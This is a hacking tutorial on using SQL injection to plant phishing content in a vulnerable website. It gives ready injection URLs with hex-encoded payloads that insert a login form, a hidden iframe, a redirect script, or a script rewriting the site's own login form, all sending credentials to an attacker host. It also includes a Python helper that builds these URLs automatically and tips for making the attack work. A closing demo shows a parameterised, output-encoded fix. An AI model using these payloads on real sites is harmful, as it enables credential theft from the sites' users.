Welcome to yet another of my tutorials on SQLi. This time, as the title says, we are going to do phishing with URL spoofing using an SQL injection vulnerability. If you have not read the basics of SQL injection, I suggest you go and read the N00bz guide to SQL injection first.

If you are new to phishing, let me explain: phishing is an attack in which the attacker fools the user into entering his secret credentials into a specially crafted page or application, which then sends them to the attacker.

The Concept:

We are going to inject our payload through the SQL injection and add some extra code to the web page, just as we did in the XSS with SQL Injection tutorial. If you have not read that one, read it first for a better understanding. The point to keep in mind is that the database is only the delivery path: the attack works because the site prints a query result into the HTML without encoding it, so whatever we put into that column becomes part of the page.

Approaches we can use to achieve it:

1. Finding the vulnerability.
2. Preparing the injectable query.
3. Injecting an HTML form into the website (for n00bz like me).
4. Injecting an iframe into the website.
5. Redirecting the user to your fake page (the URL will change).
6. Injecting JavaScript to change the current login form (for l33ts like my friend d3c0mp!l3R).

Finding the vulnerability and preparing the injectable query are covered in the basic SQL injection tutorial. Read it before you continue.

I assume you have read it all, so let's continue.

3. Injecting an HTML form into the website

Take a website where, as in the basic tutorial, the query returns four columns and the 3rd column is printed on the page as output. We inject our payload into that column. To keep things simple we hex-encode the payload: MySQL reads a 0x... literal as a string, so the payload needs no quotes of its own in the query (quotes are often what the application escapes) and can carry any characters, including the quotes and angle brackets the HTML needs.

Our Payload (the unclosed <iframe height=0 width=0> at the end is deliberate: the browser treats everything after that tag as the iframe's text content, so the rest of the original page after our injection point is not rendered; the line breaks below are dropped when the payload is hex-encoded)
<form action=http://evilsite.com/get_it.php method="POST">
Username : <input type="text" name="username"><br>
Password :<input type="text" name="password">
<input type="submit">
</form>
<iframe height=0 width=0>

Hex Encoded value:
0x3c666f726d20616374696f6e3d687474703a2f2f6576696c736974652e636f6d2f6765745f69742e706870206d6574686f643d22504f5354223e557365726e616d65203a203c696e70757420747970653d227465787422206e616d653d22757365726e616d65223e3c62723e50617373776f7264203a3c696e70757420747970653d227465787422206e616d653d2270617373776f7264223e3c696e70757420747970653d227375626d6974223e3c2f666f726d3e3c696672616d65206865696768743d302077696474683d303e


Injecting our payload:
http://exploitable-web.com/link.php?id=-1' union select 1,2,0x3c666f726d20616374696f6e3d687474703a2f2f6576696c736974652e636f6d2f6765745f69742e706870206d6574686f643d22504f5354223e557365726e616d65203a203c696e70757420747970653d227465787422206e616d653d22757365726e616d65223e3c62723e50617373776f7264203a3c696e70757420747970653d227465787422206e616d653d2270617373776f7264223e3c696e70757420747970653d227375626d6974223e3c2f666f726d3e3c696672616d65206865696768743d302077696474683d303e,4--

The above URL outputs our payload into the website, and the user sees a login form inside the real site, at the real site's URL; if he logs in, the credentials are POSTed to get_it.php on the attacker's server. One thing to check in every URL in this tutorial: MySQL only treats -- as a comment when whitespace follows it, and the browser drops a trailing space from the end of the URL, so if the page errors out, end the injection with -- - or --+ instead of a bare --.
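As an added example (not code from the original tutorial), the following Python builds the 0x literal and the union URL for any payload and decodes a literal back so you can check it before sending. The site names, the parameter name and the four-column / third-column-reflected layout are the tutorial's illustrative values, not real targets; the default comment terminator -- - is my choice, because MySQL only treats -- as a comment when whitespace follows it and a browser drops a trailing space from the URL (pass "--" to reproduce the tutorial's URLs exactly).

```python
import binascii
from urllib.parse import quote

# Added example, not code from the original tutorial. Site names, the
# parameter name and the 4-column / 3rd-column-reflected layout are the
# tutorial's illustrative values, not real targets.

FORM_PAYLOAD = (
    '<form action=http://evilsite.com/get_it.php method="POST">'
    'Username : <input type="text" name="username"><br>'
    'Password :<input type="text" name="password">'
    '<input type="submit">'
    '</form>'
    '<iframe height=0 width=0>'
)
REDIRECT_PAYLOAD = (
    '<script>window.location.href="http://www.evilsite.com/fakepage.php"</script>'
)


def mysql_hex_literal(payload: str) -> str:
    """Encode payload as a MySQL 0x... string literal.

    MySQL reads 0x... as a binary string, so the query needs no quotes
    around the payload (quotes inside it are fine too) and the literal
    survives addslashes()-style escaping of the injected parameter.
    Line breaks are dropped so the literal is a single token in the URL.
    """
    flat = payload.replace("\r", "").replace("\n", "")
    return "0x" + binascii.hexlify(flat.encode("utf-8")).decode("ascii")


def decode_hex_literal(literal: str) -> str:
    """Decode a 0x... literal back to text, to check it before use."""
    if not literal.startswith("0x") or len(literal) % 2:
        raise ValueError("not a MySQL hex literal")
    return binascii.unhexlify(literal[2:]).decode("utf-8")


def build_union_url(base: str, param: str, columns: int, reflected: int,
                    payload: str, terminator: str = "-- -",
                    url_encode: bool = False) -> str:
    """Build the union-select URL that lands payload in the reflected column.

    terminator defaults to "-- -" (see the lead-in); pass "--" to get the
    tutorial's exact URLs. url_encode=True percent-encodes the injected
    value the way a browser would before sending it.
    """
    if not 1 <= reflected <= columns:
        raise ValueError("reflected column out of range")
    cols = [str(i + 1) for i in range(columns)]        # 1,2,3,4 placeholders
    cols[reflected - 1] = mysql_hex_literal(payload)   # payload in the printed column
    injection = f"-1' union select {','.join(cols)}{terminator}"
    if url_encode:
        injection = quote(injection, safe="")
    return f"{base}?{param}={injection}"


if __name__ == "__main__":
    lit = mysql_hex_literal(REDIRECT_PAYLOAD)
    assert decode_hex_literal(lit) == REDIRECT_PAYLOAD
    print(build_union_url("http://exploitable-web.com/link.php", "id", 4, 3,
                          REDIRECT_PAYLOAD))
```

Decoding the literal before use catches the usual mistakes (a stray newline, an odd-length string from a copy-paste) that otherwise only show up as a MySQL syntax error in the target's response.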

4. Injecting an iframe into the website

This time we inject an iframe, which keeps the payload small and lets us make the login look much better: the fake login page is served from our own server and only framed inside the real site, so we can style it freely.

Our Payload
<br><iframe src="http://www.evilsite.com/fakepage.php" height=300 width=300 frameBorder="0" scrolling="no"></iframe>

Hex Encoded value
0x3c62723e3c696672616d65207372633d22687474703a2f2f7777772e6576696c736974652e636f6d2f66616b65706167652e70687022206865696768743d3330302077696474683d333030206672616d65426f726465723d223022207363726f6c6c696e673d226e6f223e3c2f696672616d653e


Injecting our payload:
http://exploitable-web.com/link.php?id=-1' union select 1,2,0x3c62723e3c696672616d65207372633d22687474703a2f2f7777772e6576696c736974652e636f6d2f66616b65706167652e70687022206865696768743d3330302077696474683d333030206672616d65426f726465723d223022207363726f6c6c696e673d226e6f223e3c2f696672616d653e,4--

The above URL outputs our iframe into the website; the user sees our fake login page framed inside the real site, with the real site's URL still in the address bar. If he logs in there, the credentials are sent to the attacker.

5. Redirecting the user to your fake page

This time we inject JavaScript that redirects the user to our fake page.

Our Payload
<script>window.location.href="http://www.evilsite.com/fakepage.php"</script>
Hex Encoded value
0x3c7363726970743e77696e646f772e6c6f636174696f6e2e687265663d22687474703a2f2f7777772e6576696c736974652e636f6d2f66616b65706167652e706870223c2f7363726970743e

Injecting our payload:
http://exploitable-web.com/link.php?id=-1' union select 1,2,0x3c7363726970743e77696e646f772e6c6f636174696f6e2e687265663d22687474703a2f2f7777772e6576696c736974652e636f6d2f66616b65706167652e706870223c2f7363726970743e,4--

The above URL injects the JavaScript into the page, which redirects the user to our fake page; if he logs in there, the credentials are sent to the attacker. The drawback is that there is no URL spoofing at all: after the redirect the address bar shows evilsite.com instead of the real site, which an attentive user can notice. The next attack fixes that.

6. Injecting JavaScript to change the current login form

In this attack we inject JavaScript that changes the action of the site's own login form to our fake page. The user logs in on the real page at the real URL; only the submit goes to us.

Our Payload
<script>document.getElementsByTagName("form")[0].action="http://www.evilsite.com/fakepage.php"</script>
Hex Encoded value
0x3c7363726970743e646f63756d656e742e676574456c656d656e747342795461674e616d652822666f726d22295b305d2e616374696f6e3d22687474703a2f2f7777772e6576696c736974652e636f6d2f66616b65706167652e706870223c2f7363726970743e

Injecting our payload:
http://exploitable-web.com/link.php?id=-1' union select 1,2,0x3c7363726970743e646f63756d656e742e676574456c656d656e747342795461674e616d652822666f726d22295b305d2e616374696f6e3d22687474703a2f2f7777772e6576696c736974652e636f6d2f66616b65706167652e706870223c2f7363726970743e,4--

The above URL injects the JavaScript into the page, so the credentials the user types into the real login form are POSTed to our fake page instead of the site. Two things to check before relying on it: the script runs at the point where the column is reflected, so if the login form appears later in the HTML, getElementsByTagName("form")[0] is empty at that moment and the script has to wait for the page to load (for example by doing the change from a window.onload handler); and [0] is simply the first form in the document, which may be a search box rather than the login form, so pick the form that contains the password field.
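All four approaches depend on the same two defects in the target page: the id is concatenated into the SQL, and a result column is echoed into the HTML unencoded. As an added example (not code from the original tutorial), here is a Python/SQLite stand-in for such a link.php next to a hardened version. The table, rows and page template are constructed for the demo; SQLite has no MySQL-style 0x string literal, so the payload is passed as a quoted string here, but the mechanics are otherwise the same.

```python
import html
import sqlite3

# Added example, not code from the original tutorial. The table, its rows
# and the page template are constructed for the demo.


def make_db() -> sqlite3.Connection:
    """Four-column table matching the tutorial's 1,2,<payload>,4 layout."""
    con = sqlite3.connect(":memory:")
    con.execute("create table links (id integer, title text, body text, hits integer)")
    con.executemany("insert into links values (?, ?, ?, ?)", [
        (1, "Home", "Welcome back", 10),
        (2, "Notes", "<b>stored markup</b>", 0),
    ])
    return con


def page_vulnerable(con: sqlite3.Connection, link_id: str) -> str:
    """The tutorial's target: link_id is concatenated into the SQL and the
    third column (body) is written into the HTML without encoding."""
    sql = f"select id, title, body, hits from links where id='{link_id}'"
    parts = [f"<h1>{title}</h1><div>{body}</div>"
             for _, title, body, _ in con.execute(sql)]
    return "<html><body>" + "".join(parts) + "</body></html>"


def page_fixed(con: sqlite3.Connection, link_id: str) -> str:
    """Hardened version. Parameterised query: the injected text is compared
    as a literal id and matches nothing, so no union row is produced.
    Output encoding: anything that does reach the page is rendered as text,
    so even a stored payload cannot add a form, iframe or script."""
    rows = con.execute("select id, title, body, hits from links where id=?",
                       (link_id,))
    parts = [f"<h1>{html.escape(str(title))}</h1><div>{html.escape(str(body))}</div>"
             for _, title, body, _ in rows]
    return "<html><body>" + "".join(parts) + "</body></html>"


# The tutorial's redirect payload in quoted-string form, with the comment
# terminator that works once a browser has stripped the trailing space.
INJECTION = ("-1' union select 1,2,"
             "'<script>window.location.href=\"http://www.evilsite.com/fakepage.php\"</script>',"
             "4-- -")

if __name__ == "__main__":
    con = make_db()
    print("vulnerable:", page_vulnerable(con, INJECTION))
    print("fixed:     ", page_fixed(con, INJECTION))
```

Run it and the vulnerable page prints the injected script tag inside the HTML while the fixed page prints an empty body for the same input; request id 2 from both to see the second defence on its own, since the stored `<b>` tag comes back as `&lt;b&gt;` only from the fixed version.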

Enjoy Hacking.

Author : Zenodermus Javanicus
Date : 2014-04-06